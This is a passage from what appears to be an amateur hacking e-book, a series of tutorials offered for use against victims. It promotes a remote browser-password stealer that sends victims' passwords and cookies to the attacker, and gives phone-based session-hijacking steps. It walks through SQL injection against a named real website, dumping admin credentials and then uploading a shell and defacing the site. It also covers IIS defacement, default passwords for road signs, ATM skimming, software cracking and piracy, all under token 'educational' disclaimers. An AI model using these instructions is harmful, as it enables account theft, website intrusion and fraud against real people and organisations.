Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Hack Turial:REMOTE PASSWORD STEALER THIS POPULAR STEALER IS BACK DUE TO POPULAR DEMAND WITH NEW MODIFICATIONS AND LIMITATIONS . IT DECRYPTS ALL STORED PASSWORDS IN THE INTERNET BROWSER . IT WORKS ON
WINDOWS VISTA AND WINDOWS 7 MACHINES AND IT IS IN BETA AND ONLY WORKS ON CHROME, FIREFOX , AND IE. IT IS DONE IN JAVA APPLET SO THEY DO NEED TO RUN THE APPLET FOR THIS TO WORK. L UCKILY, THE AVERAGE USER DOES NOT HAVE MUCH KNOWLEDGE OF COMPUTERS SO A LITTLE OF SOCIAL ENGINEERING SHOULD DO THE TRICK. BASICALLY , YOU REGISTER YOUR EMAIL, PICK A THEME AND IT WILL GIVE YOU A URL. SEND THE URL TO A SLAVE , USE A BIT OF SOCIAL ENGINEERING TO GET THEM TO CLICK ON THE LINK AND RUN THE APPLET. ONCE THE APPLET IS RAN, THEY WILL GET A FAKE ERROR MESSAGE AND THE DECRYPTED STORED PASSWORDS AND COOKIE FILES WILL BE SENT TO YOUR EMAIL .
IT IS 100% FUD. ALL THE DECRYPTION IS DONE THROUGH
THE APPLET SO IT IS NOT JDB AND NO FILES ARE DOWNLOADED TO THE SLAVE 'S COMPUTER HENCE WONT TRIGGER ANTI VIRUSES.
1. 2. 3. 4. 5.
Go to: http://stealer.ambesty.com/ Read the instructions Enter your email, click Signup/Login. It will generate a URL per theme, send your slave the URL. If all goes well, you should receive an email in your inbox with the decrypted data.
Hack Tutrial:BOOT USERS OFF WIFI W/ ANDROID WiFi Kill allows you to boot people off your WiFi connection. What you need: *ROOTED Android Phone *Android 2.1 or higher *Target WiFi network *WiFi Kill APK (download here: http://forum.ponury.net/viewtopic.php?f=12&t=10 ) 1. 2. 3. 4. 5.
Connect to the target WiFi network with your Android phone. Open WiFi Kill app. Click the ON button The app will now scan the network for PC's Press the check box next to any computer you want to boot off the internet, and their internet connection will no longer work until you uncheck it!
Hack Tutrial:SNIFF WITH ANDROID This is probably the coolest way to gain access to someones facebook account, and also works for twitter, youtube and amazon accounts. It can be done completely from your android phone, and most phones are compatible. What this requires: *Your phone must be an Android phone, and it must be unlocked. Google or youtube search how to unlock your phone, its pretty easy. *You must be on the same network as the person you want to hack into *That person must be currently using facebook on a computer *Won't work if the person is using the https security option in facebook Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 203
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 1. Once you have an unlocked phone, you need to download an app called FaceNiff. You can download from your phone at http://faceniff.ponury.net/ and its free, for the first 3 accounts you get into. If you want to get the unlocked version of the app you'll have to pay to unlock it, or you can google search for a cracked version. I recommend searching faceniff on Vuze for a cracked torrent. 2. Once the app is installed, connect to the wifi of your victim. 3. Open the FaceNiff app, and press the big power button in the middle. If it asks you to allow permissions for the app, do so. 4. It will now be monitoring activity. Anyone who uses facebook/youtube/twitter/amazon on the network you're connected to will show up on your phone. Simply click on them, and you'll be logged into their account. 5. If nothing is showing up, try using stealth mode in FaceNiff. Some routers prevent these kind of hacks; stealth mode will attempt to bypass this. Like always, this is for educational purposes only. Hack Tutrial:SQL INJECTION Hacking a vulnerable website with SQL injection allows you to obtain usernames and passwords, possibly access the admin account, and from there you could do whatever you wanted to the website really. When Anonymous hacked Sony and obtained personal information of thousands of users.. they used an advanced form of this hack. This hack can be done from any computer or device with an internet connection and a browser. 1. Find a vulnerable website. One way you can do this is by using what is called a google dork. In the Hacking websites section of this app, you can find a huge list of dorks. Simply goto google and type inurl:dorkhere 2. When you have a target URL like: http://cadaboutdrugs.ie/news.php?id=82, add a ' at the end so it looks like http://cadaboutdrugs.ie/news.php?id=82' 3. The site will be vulnerable to this hack if you get an error, or some of the websites content vanishes. If none of these things happen, this website is not vulnerable to SQLi 4. For the site used above, there is no error but content has vanished. It is vulnerable. 5. Now try for ORDER BY syntax. http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 1-http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 2-http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 3-http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 4-I have tried upto 90 but I cant Find any Error. 6. Next step to Apply UNION syntax. http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1-http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2-http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3-http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4-http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5-http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6-http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6,7-http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6,7,8--
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 204
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 7. Now at UNION SELECT 1,2,3,4,5,6,7,8-- you will see some vulnerable number on screen e.g. 2 3 4 8. Now found Version of MySQL, User, and Database Name. http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,@@version,user(),database(),5,6,7,8-9. Now you will see the following output : 5.1.49-log ---> MySQL Version aboutdr_admin@web8.novara.ie ---> User aboutdr_Test ---> Database Name 10. Now found All tables name in database http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()-11. We got our all table ->[about,carousel,contact,documents,donate,intro,links,members,news,services] in which we got our Important table which stored admin username password is -> members 12. Find columns names of members table. goto http://home2.paulschou.net/tools/xlate/ website. 13. Copy members without quotes into [ TEXT ] field and Press 14. Now We got the value 109 101 109 98 101 114 115 from [ DEC / CHAR ] field. 15. Now our query to find column names of members table will be: http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=CHAR(109,101,109,98,101,114,115)-16. Now we got all column names from members tables.-->id,username,password 17. Now find username password the query will be: http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(id,0x3a,username,0x3a,password),3,4,5,6,7,8 FROM members-18. Here we got id, username and password and 0x3a stands for --> [:] (colon) 19. Now go to Home page of site Click on Admin Login. Login with username password and Upload your shell feel free to deface or upload any page. As always, this is for educational purposes only. Use at your own risk.I tried this server for root but Unfortunately its patched server so It cant be rooted. Hack Tutrial:ISS EXPLOIT This is one of the easiest hacks you can do to a website. It will allow you to change the website around however you want as if you owned it. What you need: *A IIS vulnerable website. (the best way to find out is to try this hack, if it doesn't work its not vulnerable) *Windows xp operating system 1. Goto start and click on Run
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 205
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 2. Type this and press ok: %WINDIR%EXPLORER.EXE ,::{20D04FE0-3AEA1069A2D808002B30309D}::{BDEADF00-C265-11d0BCED-00A0C90AB50F} 3. This should open up web folders. Right click in the folder and choose New then Web folder 4. Now type in the URL of the vulnerable site (example: http://yoursite.com) and press next. 5. Click Finish 6. Now any file you put in this folder will upload to the website. To test to see if you got in, create a text file in notepad and name it test. Then try going to http://yoursite.com/test.txt and if it loads your text file, you've officially hacked the site! Hack Tutrial:Road wor sign This guide will walk you through changing the text thats displayed on those orange electronic road work signs you often see on the side of the freeway or construction zone on the roads, using the computer attached to them. What you need: *Gloves (recommended, don't get caught!) machine, one of the following scenarios will apply:
Depending on the model of the
1. The machine ONLY asks for a password. In this scenario, the password is usually DOTS which is the default. If it is not, it can be reset to DOTS by holding CNTRL and typing DIVR 2. The machine is a Sunblet, which asks for a username AND password. In this case, the user name is always Sunbelt and the password is always the number of that particular machine, found on the side of it in black paint. 3. If neither of the above are true, the computer is housed in a box, and looks like a real computer. These have complicated usernames/passwords and are complicated to operate, which is why you'll find the user's manual in the box with the computer. In the manual you will find the username/password written on the inside cover or instructions on how to reset the password. Also, if it is actually a REAL computer, you can have the most fun by infecting it the same way you would any other computer using the guides in this app :) This tutorial is for educational purposes only! Hack Tutrial:Pirating101 This guide will show you how people are able to pirate full versions of games, music, movies, and software. What is required: *A computer with an internet connection *Vuze, which can be downloaded from http://www.vuze.com/ *Optional (recommended): pirates bay search template for vuze (google this) 1. First, download and install vuze. This software is similar to other previous P2P programs like Kazaa, limewire, etc. only it uses the ever popular torrents.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 206
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree 2. To increase the amount of results you get, I recommend installed the pirates bay search template for vuze. This will add the pirates bay into the list of torrents it searches. 3. In the vuze search bar, enter the program/music/movie/game you want to download. 4. Sort by seeders; the more seeders a torrent has, the faster it will download. Torrents with higher seeders usually dont have viruses as well, because huge amounts of people wouldn't be sharing an infected file. 5. As good practice, make sure to check the comments on a file to make sure what you're downloading is legit and works. 6. Once your file is done downloading, you can find it in My Documents > Vuze downloads 7. Enjoy :) This is for educational purposes only. Pirating software/music/movies/anything is illegal. Use at your own risk. DEEP WEB This tutorial will help you access the Deep Web. What is the Deep Web? it's essentially all of the websites you can't find on the internet through a normal browser or search engine. It's all the illegal things that aren't allowed on the internet, such as: drug dealer directories, black market trades, hackers, hitmen, pedophiles, and anything else you wouldn't expect to find normally. It is highly recommended you browse the Deep Web with firewalls on, and your webcam disconnected. Be wary of what you download, and browse at your own risk! The Deep Web is not for the faint of heart. What you need: A way to access the deep web, in this guide its recommended you use the Tor browser. You can find a detailed guide on how to set this up for your best protection in the Browse anonymously tutorial in the Proect Yourself section of this app. 1. The biggest step to accessing the deep web is just getting the Tor browser. Its recommended you follow the steps in this apps tutorial for the most protection and privacy in your browsing. 2. Once in Tor, you now have access to websites with the .onion extension. The best place to start finding whats on the Deep Web is via the tor link directory. The URL for the directory is: http://torlinkbgs6aabns.onion/ 3. There are plenty of .onion websites out there that are harder to find and will take some digging, but the Hidden Wiki is a good place to start. Be safe and enjoy! Hack TutriaL:TOP 3 WAYS TO HACK ATM ATM hacking is from past is the first interest of every computer hacker.And in this article i will talk about ATM Hacking, things like how ATM Works , What are the vulnerabilities available to exploit and last but not least YES, how to patch them. So starting from the first how ATM works.Warning:- Hacking ATM is highly illegal. You can be put into cell for a minimum of 3 years along with a fine of 7 lac.This Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 207
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree article is just for educational purposes only. Do respect the law in your country. The author of the tutorial will not be responsible for any act or trails performed by you after reading the article. How ATM Works:An ATM is simply a data terminal with two input and four output devices. Like any other data terminal, the ATM has to connect to, and communicate through, a host processor. The host processor is analogous to an Internet Service Provider(ISP) in that it is the gateway through which all the various ATM networks become available to the cardholder(the person wanting the cash).Most host processors can support either leasedline or dial-up machines. Leased-line machines connect directly to the host processor through a four-wire, point-to-point, dedicated telephone line. Dial-up ATM's connect to the host processor through a normal phone line using a modem and a toll-free number, or through an Internet service provider using a local access number dialed by modem. Leased-line ATM's are preferred for very high-volume locations because of their throughput capability, and dial-up ATM's are preferred for retail merchant locations where cost is a greater factor than throughput. The initial cost for a dial-up machine is less than half that for a leased-line machine. The monthly operating costs for dial-up are only a fraction of the costs for leased-line. The host processor may be owned by a bank or financial institution, or it may be owned by an independent service provider. Bank-owned processors normally support only bank-owned machines, whereas the independent processors support merchant-owned machines.
WARNING:- HACKING ATM IS HIGHLY ILLEGAL . YOU CAN BE PUT INTO CELL FOR A MINIMUM OF 3 YEARS ALONG WITH A FINE OF 7 LAC .THIS ARTICLE IS JUST FOR EDUCATIONAL PURPOSES ONLY . D O RESPECT THE LAW IN YOUR COUNTRY . THE AUTHOR OF THE TUTORIAL WILL NOT BE RESPONSIBLE FOR ANY ACT OR TRAILS PERFORMED BY YOU AFTER READING THE ARTICLE.
METHODS OF HACKING ATM:1. MAGNETIC READER: MOST ATM HACKERS HAVE A DEVICE CALLED MAGNETIC READER WHICH THEY ATTACH OVER THE CARD SLOT ON THE ATM, AND AS ANY ONE PIN THE CARD INSIDE AUTOMATICALLY IT READS THE MAGNETIC INFORMATION. AND WITH THE ADVANCEMENT OF TIME THE WITH THE Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 208
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree HELP OF WIRELESS TECHNOLOGY , THE MAGNETIC READER AUTOMATICALLY TRANSMITTED THE DETAILS TO FRAUDSTERS IN A NEARBY LOCATION . 2. HIDDEN CAMERA: OBVIOUSLY THIS IS ONE OF THE EASY METHOD TO HACK AN ATM MACHINE BUT THIS IS SOMETHING MORE THAN HACK, HERE WE ARE NOT PENETRATING THE ATM. AS WE ALL KNOW OUR ATM IS PROTECTED BY A PIN WHICH ACTS AS OUR PASSWORD SO IF SOME ONE HAVE TO GET MONEY AFTER STEALING OUR CARD HE /SHE SHOULD HAVE THE PIN CODE TOO, THESE DAYS CRIMINALS HAVE A SOLUTION FOR THIS TOO. 3. THEY ENTER INTO THE ATM WHEN GUARD IS OUTSIDE PUT HAND ON THE ATM CAM AND SILENTLY IN 5 OR 6 SECONDS , JUST INSTALL A HIDDEN CAMERA NEAR BY THE KEYPAD OF THE ATM FROM THE USER ENTER HIS/HER PIN CODE, AND AGAIN USING THE LATEST TECHNOLOGY (WIRELESS ) AND THE PIN IS DIGITALLY RECORDED AND NOW HACKER HAVE THE CHOICE WHETHER HE WANT TO GET THE DETAILS REMOTELY OR HE /SHE WILL GO TO ATM AND GET THE DETAILS BY HIMSELF /HERSELF .
PROTECTION AGAINST ATM HACKING: 1. Do Hide the keypad when you enter your PIN CODE.2. See All around if found any camera which you think not supposed to be there do inform the ATM guard and the near by Bank. 3. DO confirm completeness of the transaction after getting the money most people get trapped into this as the said above in second method. 4. If any criminal caught to and say to extract money from ATM, to save your money just reverse your PIN Account number. Like if my PIN CODE is 1234, if some one having PIN Code like 7777 then just put a 0 (Zero) in the last digit, money will stuck half in the ATM and half outside. Hope you like the article :)Warning:- Hacking ATM is highly illegal. You can be put into cell for a minimum of 3 years along with a fine of 7 lac.This article is just for educational purposes only. Do respect the law in your country. The author of the tutorial will not be responsible for any act or trails performed by you after reading the article. Hack Tutrial:folderlocker(pass=tahir) cls @ECHO OFF title Folder Locker if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 209
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. pause goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock folder set/p "tahir=>" if NOT %tahir%==YOUR PASSWORD HERE goto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker echo Folder Unlocked successfully goto End :FAIL echo Invalid password pause goto end :MDLOCKER md Locker echo Locker created successfully pause goto End Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 210
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 211
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 212
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 213
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Hack Tutrial:Use Any Trial Software Forever! No Crack Needed
In today’s world all software developers and computer engineers continuously create a huge bundle of professional applications, standalone softwares, and smooth web applications to integrate social media sites as well as the other custom websites out there on the World Wide Web.
First of all we have to download RunAsDate software and there are two available versions one for 32bit systems and one for 64bit systems so first make sure whether your system is a 32bit or 64bit then follow along and click one of the below download links according to your system type. RunAsDate download links: for 32bit system // for 64bit systems.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 214
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
After clicking the download link and the download completes you’ll get a zipped file so go and unzip it by using WinRAR, WinZip, and 7zip or any other tool that you can get which can unzip the downloaded file.
After unzipping the downloaded file you will get a separate three files in that file, so try to double click the one that says RunAsDate.exe or follow the below image for a better demonstration.
Note: RunAsDate.exe does not need any installation just double click it and it will automatically run and for now when the application launches you will have a window like the one in the below image.
Now if we look deeply to the previous window we will notice that the the window consists three fields and a few checkboxes and buttons, so we are not going to use all of them for now we'll just use the first two fields the one “application to run:” and the one beneath it –for a better understanding look the below two images, and from this stage will chose our software from our PC’s installation directly by clicking the little Browse button on the top right corner of the application so click there and choose your desired trail software on your system and on the next field just specify the date you have installed the trial software you want to run forever and to do that make some guessing or if you noted earlier the date that will be much better.
Note: I usually note the date of installing any trial software on a sheet or I mark it on a calendar and I recommend you to do so.
Now if you have done the previous steps correctly go and click “Run” and wait a second then the application will instantly launch. And the best of is you can make a shortcut for your favorite application by just giving a name to your shortcut and click that button says “Create a desktop shortcut>>” and there you go you'll find a shortcut on your desktop so whenever you need to launch that specific software it’s not must to again launch RunAsDate and then browse your software from there, just go and click that shortcut.Congratulations now you Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 215
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree can use almost every trial software you or you may have on your system forever, with using RunAsDate but the question is how RunAsDate software works so below I will tell you in short sentences I hope that you can catch up something
from it. Hack Tutrial:How to Crack Software by Modifying DLL Files EVER WANTED TO LEARN HOW A PROGRAM PROTECTS ITSELF FROM BEING COPIED? WITH THE RIGHT TOOLS , YOU CAN EXAMINE THE INNER WORKINGS OF A PROGRAM AND LOOK AT HOW THE COPY PROTECTION WORKS . USING ASSEMBLY LANGUAGE , YOU CAN CHANGE THESE PROGRAMS SO THAT THEY NEVER HAVE TO BE REGISTERED OR PURCHASED .
STEPS 1Learn Assembly programming. In order to crack most software, you will need to have a good grasp on assembly(http://www.wikihow.com/Start-Programming-inAssembly ), which is a low-level programming language. Assembly is derived from machine language, and each assembly language is specific to the type of computer you are using. Most assembly language is expressed through binary and
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 216
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree hexadecimal(http://www.wikihow.com/Understand-Hexadecimal )
2Gather your tools. In order to examine and modify DLLs, you will need several different tools. W32DASM is a software disassembler that allows you to pick apart programs. SoftIce is a Windows debugging tool. You'll also want a good coding text editor, such as UltraEdit or Notepad++.
3 Start the program you want to crack with W32DASM. This will show you what DLL files are being loaded by the program. Use W32DASM to examine which functions are being called from the DLL.
4 Find the counter function. Many programs use a timer for copy protection, and when the timer runs out, the user is no longer able to access the program. The goal is to find this counter code, and then bypass it.
If the program you are cracking uses a different form of protection, you will need to look for that instead.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 217
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
5 Set a break-point on the counter. Once you've isolated the counter function, set SoftIce to break when it is encountered. This will allow you to look at the exact code that is occurring when the counter function is called.
6 Change the counter code. Now that you've found the code for the counter function, you can change the code so that the counter never reaches the point where it shuts you out of the program. For example, you could make it so that the counter cannot count up to the break limit or you can bypass the counter by jumping over it. Hack Tutrial:Email Hacking can be possible to many ways like:1. Social Engineering 2.Phishing Attacks3. Cookie Hijacking4. By Keyloggers Social Engineering: This Process is defined as Hack the human mind without any tools... This has become one of the hottest topics today and it seems to work out most of the times. Social Engineering doesn’t deal with the network security issues, vulnerabilities, exploits, etc. It just deals with simple Psychological tricks that help to get the information we want. This really works!! But it requires a lot of patience. We are all talking about network security and fixing the vulnerabilities in networks. But what happens if some internal person of a network accidentally gives out the passwords. After all we are all humans; we are also vulnerable Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 218
Power Of HackingÂŽ Facebook:https://www.facebook.com/HAckingRouterwifiFree and can be easily exploited and compromised than the computers. Social Engineering attacks have become most common during the chat sessions. With the increase in use of Instant Messengers, any anonymous person may have a chat with another any where in the world. The most crucial part of this attack is to win the trust of the victim. Phishing Attack: The act of sending an e-mail to a user falsely claiming to be an established legitimate enterprise in an attempt to scam the user into surroundering private information that will be used for identity theft. The e-mail directs the user to visit a Web site where they are asked to update personal information, such as passwords and credit card, social security, and bank account numbers, that the legitimate organization already has. The Web site, however, is bogus and set up only to steal the userâ&#x20AC;&#x2122;s information. Cookie Hijacking: In cookie hijacking we can hack email accounts very easily.. This trick is very dangereous because whenever user change a password then there is no need to attacker for again hack Email- ID of victim. And it would take you to inbox of victim's yahoo account without asking for any password of victim account. Keyloggers: Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about. Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party. Hack Tutrial:How To Trace Your Facebook Profile Visitors Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 219
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Now here we found who recently visited your profile. Follow below steps for get to know your FB recent visitors. Step 1) Go to your Facebook Profile Page.Step 2) Now Press Ctrl + U from your keyboard for see source code of your profile page.Step 3) Now press Ctrl + F from your keyboard to open search box.Step 4) Now search this code {"list":Step 5) You find some Facebook Profile Ids are like shown below. Click on example image for zoom.Step 6) There are some Facebook Profile Ids of your friends who visited recently. Step 7) The first one ID's are showing visits the most number of time. Step 8) Now if your want to findout, Open a new tab Enter below link : www.facebook.com/Facebook Profile Id For Example : www.facebook.com/100001051561005 Hack Tutrial:HACK PAYPAL ACCOUNT
Mr. Yas tells that How the security breach in paypal and hackers can hijack account just single click. He mentioned in his blog.
In the POC Video Mr. Yas successfully bypassed the PayPal security to generate exploit code for targeted attacks.1- Reusable CSRF Token:The CSRF token “that authenticate every single request made by the user” which can be also found in the request body of every request with the parameter name “Auth” get changed with every request made by user for security measures, but after a deep investigation I found out that the CSRF Auth is Reusable for that specific user email address or username, this means If an attacker found any of these CSRF Tokens, He can then make actions in the behave of any logged in user.Hmm, it seems interesting but still not exploitable, as there is no way for an attacker to get the “Auth” value from a victim session.2- Bypassing the CSRF Auth System:The CSRF Auth verifies every single request of that user, So what If an attacker “not logged in” tries to make a “send money” request then PayPal will ask the attacker to provide his email and password, The attacker will provide the “Victim Email” and ANY password, Then he will capture the request, The request will contain a Valid CSRF Auth token Which is Reusable and Can authorise this specific user requests. Upon Further Investigation, We have found out that an Attacker can obtain the CSRF Auth which can be valid for ALL users, by intercepting the POST request from a page that provide an Auth Token before the Logging-in process, check this page for the magical CSRF Auth “https://www.paypal.com/eg/cgi-bin/webscr?cmd=_send-money”. At this point
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 220
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree the attacker Can CSRF “almost” any request on behave of this user
The application generates a valid “Auth” token for a logged-out user!Through examination of the password change process, he found that an attacker can NOT Change the victim password without answering the Security Questions set by user, Also the user himself can NOT change the security questions without entering the password!3- ByPassing the Security Questions Change:
The initial process of “setting” security questions is not password protected and is reusable After further investigation, noticed that the request of setting up the security questions “which is initiated by the user while signing up” is not password-protected, and it can be reused to reset the security questions up without providing the password, hence, Armed with the CSRF Auth, an attacker can CSRF this process too and change the victim’s Security questions.At this point, An attacker can conduct a targeted CSRF attack against a PayPal users and take a full control over his account Hence, An attacker can CSRF all the requests including but not limited to:1- Add/Remove/Confirm Email address2Add fully privileged users to business account3- Change Security questions4Change Billing/Shipping Address5- Change Payment methods6- Change user settings(Notifications/Mobile settings) ………… and more. To automate the who process, Yas has coded a Python interactive server to demonstrate how an attacker can exploit this vulnerability in a real-life scenario attack. Hack Tutrial:-
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 221
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Ways To Attack a Network: Ping The IP address gives the attacker’s Internet address. The numerical address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain Name Service (DNS) protocol reveals the matching domain name. PING stands for “Packet Internet Groper” and is delivered with practically every Internet compatible system, including all current Windows versions. Make sure you are logged on to the net. Open the DOS shell and enter the following PING command: Ping –a 123.123.12.1 Ping will search the domain name and reveal it. You will often have information on the provider the attacker uses e.g.: dialup21982.gateway123.provider.com Pinging is normally the first step involved in hacking the target. Ping uses ICMP (Internet Control Messaging Protocol) to determine whether the target host is reachable or not. Ping sends out ICMP Echo packets to the target host, if the target host is alive it would respond back with ICMP Echo reply packets. All the versions of Windows also contain the ping tool. To ping a remote host follow the procedure below. Click Start and then click Run. Now type ping <ip address or hostname> (For example: ping yahoo.com)
This means that the attacker logged on using “provider.com”. Unfortunately, there are several IP addresses that cannot be converted into domain names. For more parameter that could be used with the ping command, go to DOS prompt and type ping /?. Ping Sweep If you are undetermined about your target and just want a live system, ping sweep is the solution for you. Ping sweep also uses ICMP to scan for live systems in the specified range of IP addresses. Though Ping sweep is similar to ping but reduces the time involved in pinging a range of IP addresses. Nmap (http://www.insecure.org) also contains an option to perform ping sweeps. Tracert: Tracert is another interesting tool available to find more interesting information about a remote host. Tracert also uses ICMP. Tracert helps you to find out some information about the systems involved in sending data (packets) from source to destination. To perform a tracert follow the procedure belo
Tracer connects to the computer whose IP has been entered and reveals all stations starting from your Internet connection. Both the IP address as well as the domain name (if available) is displayed. If PING cannot reveal a name, Traceroute will possibly deliver the name of the last or second last station to the attacker, which may enable conclusions concerning the name of the provider used by the attacker and the region from which the attacks are coming. Go to Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 222
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree DOS prompt and type tracert <destination address> (For example: tracert yahoo.com). But there are some tools available like Visual Traceroute which help you even to find the geographical location of the routers involved. http://www.visualware.com/visualroute Port Scanning:-After you have determined that your target system is alive the next important step would be to perform a port scan on the target system. There are a wide range of port scanners available for free. But many of them uses outdated techniques for port scanning which could be easily recognized by the network administrator. Personally I like to use Nmap (http://www.insecure.org) which has a wide range of options. You can download the NmapWin and its source code from:http://www.sourceforge.net/projects/nmapwin.
Apart from port scanning Nmap is capable of identifying the Operating system being used, Version numbers of various services running, firewalls being used and a lot more. Common ports:Below is a list of some common ports and the respective services running on the ports. 20 FTP data (File Transfer Protocol) 21 FTP (File Transfer Protocol) 22 SSH 23 Telnet 25 SMTP (Simple Mail Transfer Protocol) 53 DNS (Domain Name Service) 68 DHCP (Dynamic host Configuration Protocol) 79 Finger 80 HTTP 110 POP3 (Post Office Protocol, version 3) 137 NetBIOS-ns 138 NetBIOS-dgm 139 NetBIOS 143 IMAP (Internet Message Access Protocol) 161 SNMP (Simple Network Management Protocol) 194 IRC (Internet Relay Chat) 220 IMAP3 (Internet Message Access Protocol 3) 389 LDAP 443 SSL (Secure Socket Layer) 445 SMB (NetBIOS over TCP) Besides the above ports they are even some ports known as Trojan ports used by Trojans that allow remote access to that system.Vulnerability Scanning:Every operating system or the services will have some vulnerabilities due to the programming errors. These vulnerabilities are crucial for a successful hack. Bugtraq is an excellent mailing list discussing the vulnerabilities in the various system. The exploit code writers write exploit codes to exploit these vulnerabilities existing in a system. There are a number of vulnerability scanners available to scan the host for known vulnerabilities. These vulnerability scanners are very important for a network administrator to audit the network 